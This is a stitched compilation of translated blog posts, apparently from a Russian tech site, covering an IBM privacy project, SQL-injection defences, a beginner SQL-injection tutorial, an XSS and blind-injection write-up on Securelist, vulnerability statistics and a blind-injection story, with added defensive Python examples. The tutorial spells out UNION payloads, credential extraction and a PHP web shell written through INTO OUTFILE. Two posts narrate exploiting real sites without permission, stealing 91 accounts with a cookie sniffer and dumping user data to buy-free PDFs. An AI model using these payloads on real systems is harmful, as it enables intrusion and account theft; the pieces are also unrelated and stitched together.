"Our main objective for the past 150 years has been to help the victims of conflict and natural disasters, as well as other vulnerable groups, including supporting people when they are sick at home, while travelling and in transport. New technologies are playing an increasingly important role in achieving this goal, especially in home alarm systems," said Carolyn Greiner, regional manager of the German Red Cross in Rhein-Neckar and Heidelberg. "Here we offer services to senior citizens so that they can stay at home in a comfortable and familiar environment. The privacy technology tested during the project must guarantee that we provide the most professional assistance and protect our clients' personal data at the highest level. Only by taking measures to strengthen the protection of personal information can we maintain the trust of the people we serve around the world."

The second pilot project aims to improve agricultural productivity and increase Australia's export trade in products free of viral infections, especially in animals. To prevent the spread of viruses, the Australian Government, in collaboration with key partners, has developed an emergency plan for rapid response when an outbreak is detected. This plan involves the combined efforts of government, academic and other research organizations and industry partners to create a safe, secure and interactive environment for decision-making. Identity Mixer will ensure the timely exchange of confidential information between collaborating partners, regardless of the distance between them.

"The speed of response to cases plays an important role in saving the lives of people and animals," says John Zic, chief researcher at CSIRO. "Through the use of modern technologies in this project we look forward to dealing with new challenges more quickly, while maintaining the high levels of security, privacy and trust necessary for efficient operation."

"Identity Mixer is a great example of how existing personal data protection legislation around the world need not stop innovation. New solutions can enhance privacy protection with tools that are easier to use and accessible to providers," adds Peters.

Test the system in demo mode here.

AU2EU is a consortium of industrial and academic partner organizations across Europe and Australia, including Eindhoven University of Technology, Philips Electronics Nederland BV, Bicore Services BV, NEC Europe Ltd, IBM Research, the German Red Cross, Thales Communications & Security SAS, CSIRO, Edith Cowan University, RMIT University, the University of New South Wales and Macquarie University. Further information can be found at www.au2eu.eu.

Follow the discussion about Identity Mixer between IBM scientists and scientific experts on Twitter using the hashtag #identitymixer.

* Source: comScore MMX, December 2012, worldwide, age 15+.
** Tunstall Healthcare is not part of AU2EU, but provides telemedicine consultations for the Deutsches Rotes Kreuz.

Sunday, January 25, 2015

Modern authentication methods and the security of iOS devices

Today we publish two new talks from our mobile developers conference #MBLTDev, which was held in late October in Moscow.

Both talks are devoted to security: one from PayPal EMEA head Tim Messerschmidt about modern forms of authentication, the second from Andrey Belenko, lead security engineer at viaForensics, about the security of iOS devices.

Tim called for giving up passwords and explained what they can be replaced with. "8.5% of users use Password or 123456 as their password; 45% leave the site instead of resetting their password or secret answer," Tim said. "To enhance security, we suggest using PayPal on portable devices or passwordless authentication (for example, OpenID)."



Andrey explained what can go wrong in an iOS application, where the security problems are and how to fix them, as well as what to look for when developing applications from a security standpoint and what you should not do.

A very interesting way to protect against SQL injection and XSS

Mr Dan Kaminsky, whom I highly respect (known for discovering a fundamental vulnerability in DNS), proposed a very interesting technique for universal protection against SQL injection and XSS.

The method is very simple and ingenious.

The essence of the technique comes down to substituting all data into the SQL query in base64 representation; as a result, there is no need to use any parsers/analysers of the data used in the SQL query (placeholders, etc.).

All this can be roughly described by a line of the form:
SELECT * from mytable where textfield = base64_decode('Q29vbEhhY2tlcnM=')
where base64_decode is the base64 decoding function implemented by the particular database.

Because the base64 representation contains no special characters, the user-supplied data poses no threat to our query. There is no need to escape or otherwise change the input; it is enough to base64-encode it and send it in the query.

The technique is also applicable on the client side, for example if you need to place data inside quotes in an event handler or in JS. Decoding from base64 can be done directly in JS when the original data is needed.

From my point of view the method is ingenious. In my opinion it has two deficiencies: memory for variables stored this way grows by 30% (a feature of base64 encoding), and the load on the server grows because of the need to encode the input parameters (I think that can be neglected) and on the DB server because of the need to decode (which I think cannot be neglected).
However, to be exact, experiments are needed; perhaps there are knowledgeable Habr users ready to share their opinions on this?
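As an added example (not from Kaminsky or from the post above), here is the technique carried through end to end in Python against an in-memory SQLite database. SQLite has no built-in base64 decoder, so a user-defined base64_decode function is registered to stand in for the database-specific one the post mentions (MySQL's equivalent is FROM_BASE64); the table and rows are constructed sample data.

```python
import base64
import sqlite3

# Constructed sample data (not from the original post): a small "mytable"
# with a textfield column, modelled on the query shown in the post.
ROWS = [("CoolHackers",), ("alice",), ("bob",)]


def _sqlite_base64_decode(encoded):
    """User-defined function standing in for the database's own base64
    decoder (MySQL has FROM_BASE64(); SQLite has none built in)."""
    return base64.b64decode(encoded).decode("utf-8")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("base64_decode", 1, _sqlite_base64_decode)
    conn.execute("CREATE TABLE mytable (textfield TEXT)")
    conn.executemany("INSERT INTO mytable VALUES (?)", ROWS)
    return conn


def naive_query(user_input):
    """The classic mistake: user input pasted straight into the SQL text."""
    return "SELECT textfield FROM mytable WHERE textfield = '%s'" % user_input


def base64_literal(user_input):
    """Kaminsky's idea: the literal that reaches the SQL parser only ever
    contains base64 alphabet characters (A-Z a-z 0-9 + / =), so quotes,
    semicolons and comment markers in user_input cannot alter the query."""
    encoded = base64.b64encode(user_input.encode("utf-8")).decode("ascii")
    if not all(c.isalnum() or c in "+/=" for c in encoded):
        raise ValueError("base64 output left the expected alphabet")
    return "base64_decode('%s')" % encoded


def base64_query(user_input):
    """Same query as naive_query, but the value goes in as a base64 literal."""
    return "SELECT textfield FROM mytable WHERE textfield = %s" % base64_literal(user_input)


def run(conn, sql):
    return [row[0] for row in conn.execute(sql)]


def compare(user_input):
    """Run one input through both query builders and return
    (rows from the naive query, rows from the base64 query).
    A syntax error from the naive query (e.g. an unbalanced quote)
    is reported as None instead of raising."""
    conn = open_db()
    try:
        naive = run(conn, naive_query(user_input))
    except sqlite3.Error:
        naive = None
    wrapped = run(conn, base64_query(user_input))
    return naive, wrapped


def size_overhead(user_input):
    """Bytes of the value before and after encoding: base64 costs about a
    third extra, which is the storage trade-off the post points out."""
    raw = len(user_input.encode("utf-8"))
    enc = len(base64.b64encode(user_input.encode("utf-8")))
    return raw, enc
```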

SQL injection for beginners. Part 1

Greetings, reader. Lately I have become fond of web security, and my work is to some extent related to it. Because I have increasingly noticed threads on various forums asking to show how it works, I decided to write an article. The article is intended for those who have not encountered this before but would like to learn. There are quite a few articles on this subject on the net, but for beginners they are a bit complicated. I will try to describe everything in plain language and with detailed examples.


Foreword

To understand this article you do not need special knowledge of SQL, but at least a good head and a bit of patience to remember things.

I believe that reading the article once will not be enough, because we need living examples: as is known, there is no such thing as too much practice when it comes to remembering. Therefore we will write vulnerable scripts and train on them.

What is SQL injection?

Simply put, it is an attack on the database which performs an action not intended by the creator of the script. A real-life example:

Father wrote a note to Mother that she should give Vasya $100 from the bag, and put it on the table. Reworking it into a comic SQL language, we get:
GET 100 rubles OUT OF THE BAG AND GIVE THEM TO Vasya
Father wrote the note so badly (clumsy handwriting), and left it on the table, that Vasya's brother Petya saw it. Petya, being a hacker, added "OR Petya" and got this query:
GET 100 rubles OUT OF THE BAG AND GIVE THEM TO Vasya OR Petya
Mother read the note, decided that she had given Vasya the money yesterday, and gave $100 to Petya. Here is a simple real-life example of SQL injection :) Without filtering the data (Mom could barely make out the handwriting), Petya made a profit.

Training

For practice you will need the archive with the scripts for this article. Download it and unzip it on your server. Also import the database and set the connection data in the file cfg.php.

Finding SQL injection


As you know, injection comes through incoming data that is not filtered. The most common mistake is not filtering the transmitted ID. Roughly speaking, substitute quotes into all fields, whether in a GET/POST request, and even in a Cookie!



Numeric input parameter

For practice we need the script index1.php. As I said above, substitute a quote into the news ID:

sqlinj/index1.php?id=1'


Because our query has no filter:

$id = $_GET['id'];
$query = "SELECT * FROM news WHERE id = $id";


the script will understand it as
SELECT * FROM news WHERE id = 1'


and we get an error:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\WebServ\domains\sqlinj\index1.php on line 16

If no error is shown, the reasons may be:

1. There is no SQL injection here: quotes are filtered, or a conversion to (int) is in place.
2. Error output is disabled.

If, however, an error is shown: hooray! We have found the first type of SQL injection, a numeric input parameter.


String input parameter


We will send requests to index2.php. In this file the query is:
$user = $_GET['user'];
$query = "SELECT * FROM news WHERE user = '$user'";


Here we select news on behalf of a user, and once again we do not filter.
Again, send a request with a quote:
sqlinj/index2.php?user=AlexanderPHP'


An error is generated. OK! So the vulnerability is there. That is enough for a start; let's get down to practice.



Getting down to action

A bit of theory


I guess you cannot wait to retrieve something other than errors. To begin with, understand that the sign "--" is a comment in SQL.

CAUTION: there must be spaces before and after it. In a URL they are transmitted as %20.

Everything after the comment is discarded. That is, the query:
SELECT * FROM news WHERE user = 'AlexanderPHP' -- habrahabra

executes successfully. You can try this on the script index2.php by sending the request:

http://sqlinj/index2.php?user=AlexanderPHP'%20--%20habrahabr


Now learn the UNION keyword. In SQL, UNION is used to combine the results of two SQL queries into a single table. That is, it lets us get what we need from another table.



Making use of it


In the "numeric" case the query does not need us to send a quote, nor, naturally, a comment at the end. Let's go back to the script index1.php.

Requesting the script http://sqlinj/index1.php?id=1 UNION SELECT 1, we get this database query:
SELECT * FROM news WHERE id = 1 UNION SELECT 1
And it gives us an error, because a UNION query requires the same number of fields in both parts.

Since we cannot influence their number in the first query, we need to pick the number in the second so that it equals the first.

Selecting the number of fields


Selecting the number of fields is very simple; just send requests like these:
http://sqlinj/index1.php?id=1 UNION SELECT 1,2
Error...
http://sqlinj/index1.php?id=1 UNION SELECT 1,2,3
Again an error!
http://sqlinj/index1.php?id=1 UNION SELECT 1,2,3,4,5
No error! So the number of columns is 5.

GROUP BY

It often happens that there can be 20, 40 or even 60 fields. So that we do not have to go through them one by one every time, use GROUP BY.

If the request
http://sqlinj/index1.php?id=1 GROUP BY 2
does not give an error, then the number of fields is greater than 2. Try:

http://sqlinj/index1.php?id=1 GROUP BY 8
Oops, we see an error, so the number of fields is less than 8.

If GROUP BY 4 gives no error and GROUP BY 6 gives an error, then the number of fields is 5.



Definition of output columns

So that the first query outputs nothing, it is enough to substitute a non-existent ID, for example:

http://sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5

With this action we determined which columns are displayed on the page. Now, to replace these numbers with the right information, we continue the request.

Output


Suppose we know that there is also a users table with the fields id, name and pass.
We need to get information about the user with ID = 1.

Therefore we construct the query:

http://sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM users WHERE id=1
The script still displays the numbers as before.

So we substitute field names in place of the numbers 1 and 3:

http://sqlinj/index1.php?id=-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1
We got what was required!


For a "string input parameter", as in the script index2.php, you need to add a quote at the beginning and a comment character at the end. Example:
http://sqlinj/index2.php?user=-1' UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 --%20


Reading / writing files

To read and write files, the database user must have the FILE_PRIV right.

Writing files

In fact everything is very simple. To write a file we use INTO OUTFILE:
http://sqlinj/index2.php?user=-1' UNION SELECT 1,2,3,4,5 INTO OUTFILE '1.php' --%20
OK, we have written a file. In the same way a mini-shell can be written:
http://sqlinj/index2.php?user=-1' UNION SELECT 1,'<?php eval($_GET[1]) ?>',3,4,5 INTO OUTFILE '1.php' --%20

Reading files

Reading files is even easier than writing. Simply use LOAD_FILE in place of the field we select:

http://sqlinj/index2.php?user=-1' UNION SELECT 1,LOAD_FILE('1.php'),3,4,5 --%20

Thus we read the previously written file.


Ways of protection


Protecting is even easier than exploiting the vulnerability. Just filter the data. If you pass a number, use
$id = (int)$_GET['id'];

as suggested by malroc. Or use PDO prepared statements.
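An added example (not from the tutorial) of the two fixes above, written in Python against an in-memory SQLite database that stands in for the tutorial's PHP/MySQL setup: the news and users tables and their rows are constructed sample data, php_int_cast is a hypothetical helper mimicking PHP's (int) cast, and the tutorial's own UNION payloads are fed to both the vulnerable and the hardened variants to show that the fixes neutralise them.

```python
import re
import sqlite3

# Constructed sample data (not from the original tutorial). The news table has
# the five columns the tutorial counts with "UNION SELECT 1,2,3,4,5", and the
# users table has the id, name and pass fields the tutorial assumes.
NEWS = [
    (1, "First post", "hello", "AlexanderPHP", "2015-01-01"),
    (2, "Second post", "world", "AlexanderPHP", "2015-01-02"),
]
USERS = [(1, "admin", "secret-password-hash")]

# The tutorial's own payloads, used here only as inputs to show what the fixes stop.
NUMERIC_PAYLOAD = "-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1"
STRING_PAYLOAD = "-1' UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 -- "


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, user TEXT, created TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO news VALUES (?,?,?,?,?)", NEWS)
    conn.executemany("INSERT INTO users VALUES (?,?,?)", USERS)
    return conn


def php_int_cast(value):
    """Hypothetical helper mimicking PHP's (int) cast on a string:
    keep the leading integer, otherwise 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def index1_vulnerable(conn, raw_id):
    """index1.php as written: $query = "SELECT * FROM news WHERE id = $id"."""
    return conn.execute("SELECT * FROM news WHERE id = %s" % raw_id).fetchall()


def index1_fixed(conn, raw_id):
    """index1.php with $id = (int)$_GET['id']; only an integer is ever
    concatenated, so everything after the leading number is dropped."""
    return conn.execute("SELECT * FROM news WHERE id = %d" % php_int_cast(raw_id)).fetchall()


def index2_vulnerable(conn, raw_user):
    """index2.php as written: $query = "SELECT * FROM news WHERE user = '$user'"."""
    return conn.execute("SELECT * FROM news WHERE user = '%s'" % raw_user).fetchall()


def index2_fixed(conn, raw_user):
    """index2.php with a prepared statement (what PDO::prepare gives in PHP):
    the value is bound separately from the SQL text, so a quote or '--'
    inside it is just data, never syntax."""
    return conn.execute("SELECT * FROM news WHERE user = ?", (raw_user,)).fetchall()


def leaks_user_table(rows):
    """True if any returned row carries a users.pass value, i.e. the UNION
    payload managed to pull data out of the other table."""
    secrets = {pw for _, _, pw in USERS}
    return any(cell in secrets for row in rows for cell in row)
```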

Securelist.com - XSS vulnerabilities and SQL Injection

Hello everyone!
Securelist.com is developed by Kaspersky Lab. The site has a blog in which Kaspersky Lab (LK) employees post, and ordinary users, once registered, can comment on them. Comments have a rating. Once the rating of all a user's comments reaches >= 100, the user receives blogger status and can post to their own blog. And so I registered there...


[Disclaimer]
All the actions described below are presented solely for educational purposes. The portal administration has been informed of all vulnerabilities found on the website. To take some screenshots I used the service peeep.us by Habr user snusmumrik. Special thanks to the team of the portal R3AL.RU for help and support.

[XSS]
After registering, I decided to do a standard test for XSS vulnerability. I put a JS script with an alert and it worked, i.e. the Username field had no XSS filtering.
Without hesitation I put up a sniffer, commented on several blogs and waited. The sniffer hung on the site for about a month. During this time I was able to intercept 91 accounts on the site. Let's look at how the site works in more detail:
1) The user enters a username and password
2) The site writes the user's parameters into a cookie (VLUserkaspru) in the form:
id:19DEShash
where id is the user's identifier (can be found at the link securelist.com/ru/userinfo/id)
19DEShash is a standard PHP DES hash with salt = 19
3) When you go to any page of the site, the script takes the user's cookie, splits it into 2 parts (by ":"), selects the password from the database for the user where id = id, and compares the hash of the password from the database with the hash value from the cookie.
This means that, having caught just one cookie, I can log in to the website at any time (or I can brute-force the hash).
I decided to find out how passwords are stored in the database. Checking was very simple: click the "Forgot password" link and the password arrives by e-mail in the clear. This means that passwords are stored in the database in the clear, not as hashes.
Going into the account, I found that I can change the e-mail used to reset the password. The link to confirm the e-mail change goes only to the new e-mail => I can change any account's e-mail, confirm it and get its password in the clear.
As I caught cookies of LK employees, I could go to the blog control panel. It looked like this:
View of a user profile with "Administrator" status from the inside:
After a few tests I found that the blog text is also not filtered => I can insert any HTML/JS code there (for example, an exploit).
Here is the blog edit page:
The post title field is also not filtered, and the title is displayed on the main page => we can do a small defacement:
Or like this:
And especially for Habrahabr.
List of interesting ids whose cookies I could intercept:
69 - Dmitry Bestuzhev, expert, Kaspersky Lab
72 - Sergey Golovanov, expert, Kaspersky Lab
81 - Maria Namestnikova, expert, Kaspersky Lab
82 - Yury Namestnik, expert, Kaspersky Lab
85 - Tatiana Nikitina, blogger
1052 - dr, administrator
7053 - Alexander Gostev, expert, Kaspersky Lab

[SQL Injection]
After a short time I wanted to inform the site about the vulnerability, but decided to check the filtering of the cookie parameters first. And it turned out that id is not filtered!
Substituting various options in the cookie, I learned that there is a Blind SQL Injection:
12345) AND 1=2 --:hash
With this parameter I was not logged in to my account, but with
12345) AND 1=1 --:hash
I was logged in as the user.
I spent a couple of hours achieving a normal blind injection. The result was:
12345) AND 1=1 AND (SELECT ascii(substring(version(),1,1)))>100 --:hash
Those who know SQL can easily understand that here I compare the ASCII code of the first character of the version with 100. If it is greater than 100, I get the user (AND TRUE AND TRUE), otherwise I am a guest (AND TRUE AND FALSE). By substituting different values I learn the ASCII code of the character and translate it into a symbol.
The server runs PostgreSQL, not the latest version.
Extracting table names from INFORMATION_SCHEMA.TABLES:
12345) AND 1=1 AND (SELECT ascii(substring(table_name,1,1)) from INFORMATION_SCHEMA.TABLES LIMIT 1 OFFSET 1)>100 --:hash
So I started writing out the table names, but there was a bummer: I was able to extract only the name of the first table, and then the vulnerability stopped working (most likely the administrator saw the logs, but I do not rule out that someone tipped them off).

Most recently a new post called "XSS for beginners" appeared on securelist.com =)
The XSS vulnerability has not been fixed, even though I sent a letter to support and a message in the LK complaints and suggestions book (they answered that all necessary measures had been taken). Maybe this post will make the administration finally close the vulnerability.

UPD: Warning! This is not PR for the site, company or product.
UPD2: On the topic:
Magic triptych, or bad advice from KAV (the article appeared before my research, but I learned about it only recently).

45% of web resources of major Russian companies contain critical vulnerabilities

Web applications have become an integral part of the corporate information system of any modern organization, regardless of its type of activity. Not only commercial companies have their own web resources, but also government agencies that develop web services to provide online services.

Despite all the advantages of web applications, their vulnerabilities are one of the most common ways of getting into corporate information systems. This is confirmed by the statistical studies that Positive Technologies experts conduct annually.

The research focused on the resources of 67 of the largest Russian public organizations and companies in the industrial, telecommunications and IT sectors (banking systems are covered in a separate paper).

Note: the study analysed data collected during web application security assessments in 2012.

The most common vulnerabilities

Among the 10 most common vulnerabilities are two critical ones, SQL Injection and Directory Traversal, to which 33% and 18% of the surveyed web resources are subject, respectively.

In 2012 the most widespread information disclosure vulnerability was Fingerprinting, which allows identifying the software and preparing the base for an attack: three-quarters of the surveyed resources (73%) are prone to this flaw. In second place with 63% is Cross-site Scripting. Almost half of the systems (46%) have flaws that allow automated guessing of credentials and passwords (Brute Force).


Vulnerabilities by web application development technology

According to the study, 83% of web applications developed in PHP contain critical vulnerabilities; the remaining 17% of such systems contain medium and low risk vulnerabilities. In second place is Perl: almost a third of systems contain high-risk vulnerabilities.


Vulnerabilities by web server

In 2012 the applications most prone to high-risk vulnerabilities were those using the Apache web server: 88% of them contain critical security flaws. In second place is Tomcat, with 75% of resources containing high-risk errors. Third place with 43% of vulnerable resources went to Nginx, and the most secure web server turned out to be IIS (14%).

Recall that in the previous studies the more vulnerable web servers were Nginx and Apache.


Most web server vulnerabilities are associated with administration errors, the most common of which is Information Leakage.

Vulnerability by industry

The highest concentration of web applications containing high-risk vulnerabilities was identified in the telecommunications industry: 78%. In the industrial sector exactly half (50%) of resources contain critical security flaws, followed by a small margin by the sites of IT and information security companies (45%). As for government organizations, approximately one in three (27%) web applications in this area contains a high-risk vulnerability.

Findings

In general, compared to 2011 the average level of web application security has become a little higher: in particular, the proportion of sites containing critical vulnerabilities decreased by 15% to almost 45%. Positive Technologies experts found only one infected web application, whereas previously 10% of websites contained malicious code. On the other hand, there are signs of stagnation: the proportion of web applications with high-risk vulnerabilities in the industrial sector did not change, and the security level of telecom sector sites is increasing very slowly.

A detective story about SQL injection, sometimes blind

Good day!

I would not have thought to write an article about this, because I thought the theme was pretty jaded. But judging by this article, the audience is interested. This comment finally convinced me that I should write it.

This story happened to "a friend of a friend of my friend", but for the sake of brevity I will write in his words, using just "I". It was a week ago. Let's go.

I needed to learn a European language, in light of a possible move to a European country. And I found a wonderful website that offered learning a language via podcasts. The podcasts themselves are free, but you can buy PDF transcripts of the lessons and exercises. I do not really need them, but my wife, unlike me, is not an auditory learner, and she also needs to learn the language. Before buying something online, I study the merchant's website first: I do not want my data to leak somewhere. And in this case everything was more than bad. The desire to buy something disappeared immediately. But being left without the PDFs felt unsportsmanlike. As a result, I decided to try to take advantage of one of the vulnerabilities I had found. I must say that I do not use any automated vulnerability scanners on principle, and I do no harm to the users of the resource: they are not to blame that the owner of the resource wrote it clumsily. Therefore my tools are my wits and theoretical knowledge of the causes and exploitation of vulnerabilities.

Beginning

The first thing I looked at was a few demo PDFs available for download. First, the user is sent to:

/guide.php?id=lesson_id

At this point it is checked whether the current user has the right to download the PDF. If so, they are redirected to:

/download.php?f=filename.pdf

It immediately turned out that the script serves the specified file without any check. Because the available example lesson No. 1 had the filename 001.pdf, I decided to try to get all the files by enumeration. If only it were that simple, there would be nothing to write about. In this way I managed to get only the first 100 files. The rest had the creation timestamp in the name, and getting them this way became impossible, since the creation times differed by several months.

Rotate an SQL injection

Pretty soon discovered banal SQL injection in the GET parameter:

/some_script.php?id=123

It seems to be on its use is constructed very simply:
Determine the number of parameters in the query
Choose the table and field names (in the case of MySQL 5.0 and above - select them from information_schema)
Get the desired file names
Download files themselves

But problems began with the first point - to determine the number of fields in the query failed. With any number of fields in the UNION SELECT and any room in the ORDER BY n I get the message «You have error in your syntax ...»

In fact, I accidentally realized what exactly the problem - trying to make GROUP BY 1. To this I received an error «can not group by cnt». It turned out that the vulnerable parameter is used twice (well, at least that's the assumption I was unable to refute).

First the number of records with the given id is selected:

SELECT count(*) FROM table WHERE id = 123

If the number of records is 0, the page is considered not found and there is a redirect to the home page. If it is not 0, the data is pulled:

SELECT * FROM table WHERE id = 123

Now it becomes clear why it was impossible to find out the number of columns: there are two queries, and in one of them the number of columns in the UNION will always be wrong. I could not think of a way to insert a different number of columns into the UNION of the first and the second query. At this point the SQL injection became blind. I could not find the table with the file paths, but I managed to find the name of the table with the user data (MySQL 4.1).

Dear developers, do not make two queries where one will do! In this case, instead of SELECT count(*) you could have checked the number of records returned by the SELECT * query itself.
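The two-query pattern described above, beside the form the post asks developers for, as an added example that is not part of the original post. It uses an in-memory SQLite database and constructed tables (lesson, entitlement) as a stand-in for the site's MySQL schema; PDF_ROOT and the table and column names are assumptions. The hardened lookup binds the id and makes a single query, and the download helper adds the entitlement and path checks that download.php lacked.

```python
import os
import sqlite3

# Constructed demo data (not from the post): a lesson table and a per-user
# entitlement table standing in for the site's MySQL schema.
LESSONS = [(123, "001.pdf"), (124, "1420000000.pdf")]
ENTITLEMENTS = [("alice", 123)]          # alice bought lesson 123 only
PDF_ROOT = "/srv/lessons"                # assumed location of the PDFs


def build_demo_db():
    """Create an in-memory SQLite database holding the constructed tables above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE lesson (id INTEGER PRIMARY KEY, filename TEXT NOT NULL)")
    conn.execute("CREATE TABLE entitlement (username TEXT NOT NULL, lesson_id INTEGER NOT NULL)")
    conn.executemany("INSERT INTO lesson VALUES (?, ?)", LESSONS)
    conn.executemany("INSERT INTO entitlement VALUES (?, ?)", ENTITLEMENTS)
    return conn


def lookup_lesson_vulnerable(conn, raw_id):
    """The pattern the post describes: the raw id is spliced into two queries."""
    (count,) = conn.execute(f"SELECT count(*) FROM lesson WHERE id = {raw_id}").fetchone()
    if count == 0:
        return None                       # the site redirects to the home page here
    return conn.execute(f"SELECT * FROM lesson WHERE id = {raw_id}").fetchone()


def lookup_lesson(conn, raw_id):
    """Hardened: validate the type, bind the value, run one query; 'not found'
    is simply an empty result, so no separate count(*) round trip is needed."""
    try:
        lesson_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    return conn.execute("SELECT id, filename FROM lesson WHERE id = ?", (lesson_id,)).fetchone()


def probe(lookup, conn, raw_id):
    """Classify a handler's reaction to an input as 'row', 'none' or 'error'.
    A database error on a numeric parameter is exactly what the post's
    «You have an error in your SQL syntax» message looked like from outside."""
    try:
        return "row" if lookup(conn, raw_id) else "none"
    except sqlite3.Error:
        return "error"


def authorised_download_path(conn, username, raw_lesson_id):
    """The check download.php lacked: resolve the file through the requester's
    entitlement, never from a client-supplied filename, and keep it under PDF_ROOT."""
    try:
        lesson_id = int(raw_lesson_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "SELECT l.filename FROM lesson l JOIN entitlement e ON e.lesson_id = l.id "
        "WHERE e.username = ? AND l.id = ?",
        (username, lesson_id),
    ).fetchone()
    if row is None:
        return None
    root = os.path.realpath(PDF_ROOT)
    path = os.path.realpath(os.path.join(root, row[0]))
    if os.path.dirname(path) != root:      # refuse anything that escapes PDF_ROOT
        return None
    return path
```

With the hardened handler a non-numeric id yields the same "not found" answer as an unknown id, so there is no error channel and no count(*) to confuse, and the download path is derived from what the user is entitled to rather than from the request.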

Now it remained to find a way to extract useful information. I did it like this:

/script.php?id=123 limit 0,0 union all select length (username)> 4 from tablename limit 0,1--

What we see here:
123 limit 0,0 - since count(*) will always return exactly one record to us, and we know it was returned by our part of the query, we need to remove it from the result
union all select length(username)>4 from tablename limit 0,1-- - if the user name is longer than 4, the condition is true, MySQL returns 1, and then an error occurs when the second query is executed. If the condition is false, 0 is returned and there is a redirect. And '--' comments out the end of the query

Thus from the HTTP headers we can tell whether the condition held. First we determine the length of the user name, then by binary search we pull out the name itself letter by letter (lower(substr(username,1,1)) in ('a','b','c')). Then we pull out the password letter by letter. But it turns out the password is hashed with md5. Although the hashing is unsalted, I still could not recover the site administrators' passwords (they were not in any rainbow tables, I did not want to deal with brute force on a netbook, and besides, it is unsporting).

After some deliberation I decided to go another way. Since the base turned out to have more than 60,000 users, I assumed that many of them had popular passwords. Then it only remained to pull out, in alphabetical order, the user names whose password hash is md5('password'): there turned out to be more than 100 of them, and among them were people who had bought the desired PDF. They were kind enough to share it with me.

All this was done with a very simple script that sent HEAD requests (why would we need the page body?) and watched the response status. If 200, the condition is true; if 302, false.
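What the traffic just described looks like in a web server's access log, and how to pick it out, as an added example that is not part of the original post. The log lines are constructed in common log format (the IPs are documentation addresses), the detector is a plain per-client counter over requests whose query string contains SQL shapes, and the threshold is an assumed tuning value.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access log lines (not from the post) in common log format. They show
# the traffic shape the post describes: one client sending HEAD requests whose
# query string carries SQL, with the server answering 200 or 302 depending on
# the injected condition; the other clients are ordinary visitors.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jan/2015:10:00:01 +0300] "HEAD /script.php?id=123%20limit%200,0%20union%20all%20select%20length(username)%3E4%20from%20tablename%20limit%200,1-- HTTP/1.1" 200 0
203.0.113.7 - - [23/Jan/2015:10:00:02 +0300] "HEAD /script.php?id=123%20limit%200,0%20union%20all%20select%20length(username)%3E8%20from%20tablename%20limit%200,1-- HTTP/1.1" 302 0
203.0.113.7 - - [23/Jan/2015:10:00:03 +0300] "HEAD /script.php?id=123%20limit%200,0%20union%20all%20select%20lower(substr(username,1,1))%20in%20('a','b','c')%20from%20tablename%20limit%200,1-- HTTP/1.1" 200 0
203.0.113.7 - - [23/Jan/2015:10:00:04 +0300] "HEAD /script.php?id=123%20limit%200,0%20union%20all%20select%20lower(substr(username,1,1))%20in%20('d','e','f')%20from%20tablename%20limit%200,1-- HTTP/1.1" 302 0
198.51.100.20 - - [23/Jan/2015:10:00:05 +0300] "GET /guide.php?id=5 HTTP/1.1" 302 0
198.51.100.20 - - [23/Jan/2015:10:00:06 +0300] "GET /script.php?id=123 HTTP/1.1" 200 4122
192.0.2.9 - - [23/Jan/2015:10:00:07 +0300] "HEAD /index.php HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# SQL shapes that have no business in a numeric id parameter.
SQLI_RE = re.compile(
    r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|information_schema|\bsubstr\s*\(", re.I
)


def parse_line(line):
    """Return ip, method, decoded query string and status for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["query"] = unquote_plus(rec["url"].partition("?")[2])
    return rec


def flag_blind_sqli(log_text, threshold=3):
    """Per client IP, count requests whose query string looks like SQL. Clients at or
    above the threshold are returned with how many used HEAD and which statuses
    they drew; a 200/302 mix on otherwise identical requests is the oracle."""
    per_ip = defaultdict(lambda: {"sqli": 0, "head": 0, "statuses": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not SQLI_RE.search(rec["query"]):
            continue
        stats = per_ip[rec["ip"]]
        stats["sqli"] += 1
        if rec["method"] == "HEAD":
            stats["head"] += 1
        stats["statuses"].add(rec["status"])
    return {ip: s for ip, s in per_ip.items() if s["sqli"] >= threshold}


if __name__ == "__main__":
    for ip, s in flag_blind_sqli(SAMPLE_LOG).items():
        print(f"{ip}: {s['sqli']} SQL-shaped requests, {s['head']} via HEAD, "
              f"statuses {sorted(s['statuses'])}")
```

The decoding step matters: the keywords arrive percent-encoded, so a filter applied to the raw request line misses them. On a real site the rate of such requests from one client over a few minutes, together with the HEAD method and the alternating statuses, is a far stronger signal than any single line.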

Conclusion

Why was all this written? To show that it is necessary to know the nature and causes of a vulnerability rather than to learn by rote how to exploit it. All the SQL injection walkthroughs I have seen on the internet tell you to determine the number of columns with ORDER BY 5 or UNION SELECT 1,2,3 ... A person who did not want to think would have walked away from this site with nothing.

In addition, I am a bit proud of my workaround instead of breaking the hash. And not so long ago people were expressing skepticism about the existence of such vulnerabilities on today's Internet and about the practical applicability of blind SQL injection.

Friday, January 23, 2015

A judge accepted the use of an encrypted mail service as a sign of terrorism

